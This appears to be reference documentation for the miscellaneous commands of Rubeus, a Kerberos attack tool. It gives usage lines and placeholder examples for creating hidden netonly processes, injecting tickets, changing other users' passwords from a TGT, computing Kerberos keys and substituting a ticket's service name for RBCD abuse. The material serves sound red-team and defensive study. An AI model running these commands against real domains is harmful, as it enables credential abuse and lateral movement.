Miscellaneous Commands

Utility commands: process creation, password change, hash calculation, ticket manipulation.


createnetonly

Create a hidden process with LOGON_TYPE 9 (NewCredentials / runas /netonly). Used to create a sacrificial logon session for applying tickets without clobbering the current session.

Usage

Rubeus.exe createnetonly /program:"<exe-path>" [/show] [/ticket:<ticket> | /ticket:<file>.kirbi]

Options

  • /program:"<exe-path>" – path to the executable to launch
  • /show – display the created process window (default: hidden)
  • /ticket:<ticket> – inject a ticket into the new process immediately

Examples

# Create hidden process
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe"

# Create visible cmd.exe
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

# Create and inject ticket
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show /ticket:<ticket>.kirbi

# Then apply another ticket to that LUID (elevated)
Rubeus.exe ptt /luid:0x4a091c0 /ticket:<ticket>

changepw

Reset a user's Kerberos password using an existing TGT (Aorato technique / MS kpasswd). Equivalent to Kekeo's misc::changepw.

Usage

Rubeus.exe changepw </ticket:<ticket> | /ticket:<file>.kirbi> /new:<new-password> [/dc:<dc-ip>] [/targetuser:<domain>\<username>]

Options

  • /ticket:<ticket> – TGT or kadmin/changepw service ticket
  • /new:<new-password> – new password to set
  • /dc:<dc-ip> – domain controller (port 464)
  • /targetuser:<domain>\<username> – change another user's password (requires sufficient privileges)

Examples

# Change own password
Rubeus.exe changepw /ticket:<ticket> /new:<new-password>

# Change another user's password
Rubeus.exe changepw /ticket:<ticket> /new:<new-password> /targetuser:<domain>\<username>

# First get a TGT
Rubeus.exe asktgt /user:<username> /password:<password> /changepw

hash

Calculate Kerberos encryption keys (rc4_hmac, aes128, aes256, des_cbc_md5) from a plaintext password.

Usage

Rubeus.exe hash /password:<password> [/user:<username>] [/domain:<domain>]

Options

  • /password:<password> – plaintext password to hash
  • /user:<username> – username (required for AES/DES; used as part of the salt)
  • /domain:<domain> – domain (required for AES/DES; used as part of the salt)

Examples

# RC4/NTLM only
Rubeus.exe hash /password:<password>

# All hash types (AES requires user+domain for salt)
Rubeus.exe hash /password:<password> /user:<username> /domain:<domain>

tgssub

Substitute an alternate service name (sname) into an existing service ticket. Exploits the fact that the sname field in a KRB-CRED is not protected by signature, only the server name is.

Usage

Rubeus.exe tgssub </ticket:<ticket> | /ticket:<file>.kirbi> /altservice:<spn> [/srealm:<domain>] [/ptt] [/luid] [/nowrap]

Options

  • /ticket:<ticket> – source service ticket (base64 or .kirbi)
  • /altservice:<spn> – replacement service name, either:
      • a standalone sname: cifs, ldap, host
      • a full SPN: cifs/<computer>.<domain>
  • /srealm:<domain> – optional: change the service realm
  • /ptt – inject the resulting ticket
  • /luid – apply to a specific LUID (elevated)
  • /nowrap – don't line-wrap the output

Examples

# Substitute cifs for ldap in a service ticket
Rubeus.exe tgssub /ticket:<ticket> /altservice:cifs /ptt

# Full SPN substitution (RBCD abuse)
Rubeus.exe tgssub /ticket:<ticket> /altservice:cifs/<computer>.<domain> /ptt

currentluid

Display the current user's logon ID (LUID).

Rubeus.exe currentluid

logonsession

Display information about the current logon session (or all sessions if elevated).

Rubeus.exe logonsession [/current] [/luid:<luid>]

asrep2kirbi

Convert an AS-REP and a client session key into a usable Kirbi (KRB-CRED).

Rubeus.exe asrep2kirbi /asrep:<base64-or-filepath> </key:<base64-key> | /keyhex:<hex-string>> [/enctype:DES|RC4|AES128|AES256] [/ptt] [/luid:<luid>] [/nowrap]

kirbi

Manipulate Kirbi files – currently supports inserting/replacing the session key.

Rubeus.exe kirbi /kirbi:<base64-or-filepath> /sessionkey:<session-key> /sessionetype:DES|RC4|AES128|AES256 [/ptt] [/luid:<luid>] [/outfile:<output>] [/nowrap]

Global Flags

These flags apply to all commands:

  • /nowrap – prevent base64 output from being line-wrapped
  • /consoleoutfile:C:\output.txt – redirect all console output to a file
  • /debug – output ASN.1 debugging information

Decode Base64 Ticket

# PowerShell: write a base64 ticket blob out as a .kirbi file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64-blob>"))